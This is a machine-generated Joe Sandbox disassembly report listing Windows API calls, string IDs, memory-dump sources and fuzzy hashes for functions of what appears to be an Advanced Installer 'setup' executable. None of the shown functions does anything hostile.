                                                                                                                                                                                • Part of subcall function 00D80260: LeaveCriticalSection.KERNEL32(00E9FF6C,?,?,?,00BAAD96,00EA0B9C,02141699,?,?,00DA83BD,000000FF,?,00BC2409,?,?,?), ref: 00D802A8
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,?,02141699,?,?), ref: 00CD201A
                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00CD2021
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00CD2035
                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD203C
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00E1A104,00000002,?,?), ref: 00CD20CB
                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00CD20D2
                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00CD2369
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleHandle$AttributeCriticalInit_thread_footerSectionText$BufferEnterInfoLeaveScreenWindow
                                                                                                                                                                              • String ID: Error
                                                                                                                                                                              • API String ID: 2811146417-2619118453
                                                                                                                                                                              • Opcode ID: 2f8f6b5ecbe0b85695d49cdfecdc7b69b44a0f130df0320bd2eb2f0b23eaf71d
                                                                                                                                                                              • Instruction ID: 2632c7245fdb3ae3e35a9f968d0974a643e5a4992464065215fcc692579a3e99
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8f6b5ecbe0b85695d49cdfecdc7b69b44a0f130df0320bd2eb2f0b23eaf71d
                                                                                                                                                                              • Instruction Fuzzy Hash: C0428B70D00219DFDB24CF68CC45BAEBBB0BF59314F1042AAE559B7291EB746A85CF90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00CAAC39
                                                                                                                                                                              • RedrawWindow.USER32(?,00000000,00000000,00000541), ref: 00CAAC4B
                                                                                                                                                                              • SendMessageW.USER32(?,00000443,00000000), ref: 00CAACA3
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00CAACC7
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAACD2
                                                                                                                                                                              • MulDiv.KERNEL32(?,00000000), ref: 00CAACDA
                                                                                                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 00CAACFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CapsCreateDeviceFontMessageRedrawSend
                                                                                                                                                                              • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                                                                                                                                              • API String ID: 367477953-2319862951
                                                                                                                                                                              • Opcode ID: c0a554d79f80420704c673020fe06dcae93ff26cf0c737bbef9ea51dd48fc4a1
                                                                                                                                                                              • Instruction ID: 426aa9ecf198101c19ab60b7a9f6535b9078ce07a526a181c5cf03bba133c13f
                                                                                                                                                                              • Opcode Fuzzy Hash: c0a554d79f80420704c673020fe06dcae93ff26cf0c737bbef9ea51dd48fc4a1
                                                                                                                                                                              • Instruction Fuzzy Hash: 39D1D331A00605AFEB14CF24CC95BEEB7F1FF49304F108699E55AA72D1DB746A49CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD975F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$SpawnDialog$Title$`Dialog_`='
                                                                                                                                                                              • API String ID: 3850602802-1412757306
                                                                                                                                                                              • Opcode ID: 081976fee459dd92b9f644ee2b04dd16969bb604651d270ceacf7f7ebe5d8bfc
                                                                                                                                                                              • Instruction ID: 606eee8e5c21deeba91b9292dd73f4d324a65745a8b2cdcd9ee593723466f903
                                                                                                                                                                              • Opcode Fuzzy Hash: 081976fee459dd92b9f644ee2b04dd16969bb604651d270ceacf7f7ebe5d8bfc
                                                                                                                                                                              • Instruction Fuzzy Hash: D2728D31D00258DFDB14DF64C895BEEB7B1FF59304F148299E409AB391EB74AA84CBA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $AI_DynInstances$AI_GenNewCompGuids$AI_MajorUpgrades$InstanceId$Manufacturer$OldProductCode$ProductCode$ProductVersion$UpgradeCode
                                                                                                                                                                              • API String ID: 0-614494711
                                                                                                                                                                              • Opcode ID: 0016ce505927dd8bba4d0a87f517e669788f91e8af236c6236fd0905feb677f1
                                                                                                                                                                              • Instruction ID: 01b5bf07caa283e6fa26ed7d70c81b9b118f793a6a6fb43ac2a7116ef38bdcd2
                                                                                                                                                                              • Opcode Fuzzy Hash: 0016ce505927dd8bba4d0a87f517e669788f91e8af236c6236fd0905feb677f1
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B62BC31D002588BDB14CB68CC95BEEBBB1EF55304F2482DDE446B7691DB746E84CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB3D9
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB498
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000), ref: 00CCB598
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 00CCB635
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCB65B
                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00CCB6A5
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CCB729
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$_wcsrchr$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 370096839-0
                                                                                                                                                                              • Opcode ID: 76e90f78987d194d13f5b8cb2a5e7b359199fdfc3fb5df226f4d7fb7a6047f03
                                                                                                                                                                              • Instruction ID: 6e6dcdb36f3330de4e8a028def16106fb75a5948f5a09c1919568257504d2d8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 76e90f78987d194d13f5b8cb2a5e7b359199fdfc3fb5df226f4d7fb7a6047f03
                                                                                                                                                                              • Instruction Fuzzy Hash: 56C1B271A042059FDB14DFA9CC46BAEB7F8FF44324F20466EE825D7281D7759E048BA0
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                              • Opcode ID: e8a0f3f6caa2c6640015c58db5852457941024b5fd5321e6f89cd032d6017d9d
                                                                                                                                                                              • Instruction ID: 3811d6198c6c290a9c9017afb4ebcdfdfbf78aa356efc60ebc62c5b680ee863a
                                                                                                                                                                              • Opcode Fuzzy Hash: e8a0f3f6caa2c6640015c58db5852457941024b5fd5321e6f89cd032d6017d9d
                                                                                                                                                                              • Instruction Fuzzy Hash: B4D23C71E082288FDB65CF28DC407EAB7B5EB86314F1845EAE44DE7240D774AE858F61
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F7B2,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F898
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,00BB8164,?), ref: 00D7F8BF
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8C6
                                                                                                                                                                              • InitializeSListHead.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F8E8
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F8EF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1475849761-0
                                                                                                                                                                              • Opcode ID: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction ID: aaa7302cbc80432ba9c6d3cc009c2f6a3e5db9f3acee5ac09d83a4ccde6d1afd
                                                                                                                                                                              • Opcode Fuzzy Hash: b8388a6902e59a8ae240f1d3d175cc0e65c70fc1a13d590b55eb4f2920c65cb9
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F04F71741602DFE7209F7AAC08B1676E8EF99712F244539F945E3250EB31C845CA71
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                              • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                                                                                                                                              • API String ID: 1385522511-2308371840
                                                                                                                                                                              • Opcode ID: 7bca596a8140de24998419c1c6257e01f0f6c55c2edd160d9226bc1d4f0e71f5
                                                                                                                                                                              • Instruction ID: 07933f9b3c5a5207e734ef576cb7e89a294cfa668d07c1fb7441bdb92cb1a7dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bca596a8140de24998419c1c6257e01f0f6c55c2edd160d9226bc1d4f0e71f5
                                                                                                                                                                              • Instruction Fuzzy Hash: B622A070D10248DFDB18DFA4C899BEEBBB1EF45304F24829DE405B7291DB746A85CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                              • Opcode ID: a4473bbf9f503decba0e7483b31eca65fff1e717c1630b579ce9787749cead10
                                                                                                                                                                              • Instruction ID: b64f33c7dd2f8f3d871affd926975a1cbde4b8486bc4ae3318eb8fa6b6afbaa9
                                                                                                                                                                              • Opcode Fuzzy Hash: a4473bbf9f503decba0e7483b31eca65fff1e717c1630b579ce9787749cead10
                                                                                                                                                                              • Instruction Fuzzy Hash: E6B155729042469FDF118F68C881BEEBBE5EF5B740F19816AE805EB241DA34DD05DBB0
                                                                                                                                                                              APIs
                                                                                                                                                                              • KillTimer.USER32(00000003,00000001,02141699,?,?,?,?,00DAD844,000000FF), ref: 00BC3E81
                                                                                                                                                                              • GetWindowLongW.USER32(00000003,000000FC), ref: 00BC3E96
                                                                                                                                                                              • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00BC3EA8
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,02141699,?,?,?,?,00DAD844,000000FF), ref: 00BC3ED3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$CriticalDeleteKillSectionTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1032004442-0
                                                                                                                                                                              • Opcode ID: 536fe4422b0f5edc354bb22bd00271164f06e6c791f72eafb52597f1c530ef6a
                                                                                                                                                                              • Instruction ID: d3e5998315406d7116c1b544f60b68caa2ca82015d90138486270c434b07b193
                                                                                                                                                                              • Opcode Fuzzy Hash: 536fe4422b0f5edc354bb22bd00271164f06e6c791f72eafb52597f1c530ef6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 2531A071904246AFCB20DF25DC44B9ABBF4FB05710F14826AE814E3691D7B1EA14CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                                                                                                                                              • API String ID: 0-932585912
                                                                                                                                                                              • Opcode ID: 362d57c5e725bab7b588e783d34e28f954371e9c9bfed7ee7171bc8e30889692
                                                                                                                                                                              • Instruction ID: a8de9351d73e2b18f243d8f9d42908dcd74f0caaf71ee15aaa83c11cc3addd3f
                                                                                                                                                                              • Opcode Fuzzy Hash: 362d57c5e725bab7b588e783d34e28f954371e9c9bfed7ee7171bc8e30889692
                                                                                                                                                                              • Instruction Fuzzy Hash: 5642C071D002188BDB18CF68C894FAEB7F1EF85300F14829DE495AB396D774AA45CBA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <> "$ = "$Hide$Show
                                                                                                                                                                              • API String ID: 0-289022205
                                                                                                                                                                              • Opcode ID: 6c6ff1ac59766bbfacf4ab0f46998911c9b0b92268ab70ea938326e20af8e320
                                                                                                                                                                              • Instruction ID: e94ddad3d5c7a609bc725def66fb1df5b625b7917c8efabcc4beda6328b4a80d
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c6ff1ac59766bbfacf4ab0f46998911c9b0b92268ab70ea938326e20af8e320
                                                                                                                                                                              • Instruction Fuzzy Hash: B6F15C70D04259DFDB24DF64CC55BAEB7B1BF55304F1082DAE0097B291EB74AA84CBA1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MultipleInstances$MultipleInstancesProps$OldProductCode$ProductCode
                                                                                                                                                                              • API String ID: 0-469785651
                                                                                                                                                                              • Opcode ID: 666cfe8b21fbb9719074acd65ed4f730092ba5198c862e9ccbfd946f5478cdea
                                                                                                                                                                              • Instruction ID: 65902b9cdc33327927f7d934cefaeb851c044749275f99aaa621e242a279da0b
                                                                                                                                                                              • Opcode Fuzzy Hash: 666cfe8b21fbb9719074acd65ed4f730092ba5198c862e9ccbfd946f5478cdea
                                                                                                                                                                              • Instruction Fuzzy Hash: 7FC1C235A00202DBEB18DF58C899FBAB7F2FF95714B5541EDD8026B244EB30AD45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualQuery.KERNEL32(80000000,00D7D037,0000001C,00D7D22C,00000000,?,?,?,?,?,?,?,00D7D037,00000004,00E9FA78,00D7D2BC), ref: 00D7D103
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00D7D037,00000004,00E9FA78,00D7D2BC), ref: 00D7D11E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                                                                                                              • String ID: D
                                                                                                                                                                              • API String ID: 401686933-2746444292
                                                                                                                                                                              • Opcode ID: a63fa266fa62cbb4cec11cd53a17453996f30fbcf38de3943b564edfebff42d1
                                                                                                                                                                              • Instruction ID: 744919a1a72a04fb5321e1d61887d7307aa3bf9f0616cd1d558112aadcd6b2dd
                                                                                                                                                                              • Opcode Fuzzy Hash: a63fa266fa62cbb4cec11cd53a17453996f30fbcf38de3943b564edfebff42d1
                                                                                                                                                                              • Instruction Fuzzy Hash: BE01F732600209ABCB14DF29CC05BDE7BBAAFC4324F0CC220ED1DD7245E638D845C690
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BBAD10: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9FEF0,00000000,02141699,00BA0000,Function_00207E40,000000FF,?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD35
                                                                                                                                                                                • Part of subcall function 00BBAD10: GetLastError.KERNEL32(?,00D7F5B2,?,?,?,00BA7726), ref: 00BBAD3F
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BA7726), ref: 00D7F5B6
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA7726), ref: 00D7F5C5
                                                                                                                                                                              Strings
                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7F5C0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                              • API String ID: 450123788-631824599
                                                                                                                                                                              • Opcode ID: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction ID: 4f4eb45a9cf6ce994a473ba2cd8213bf5d007af5b9c14db323698b0f3cc14360
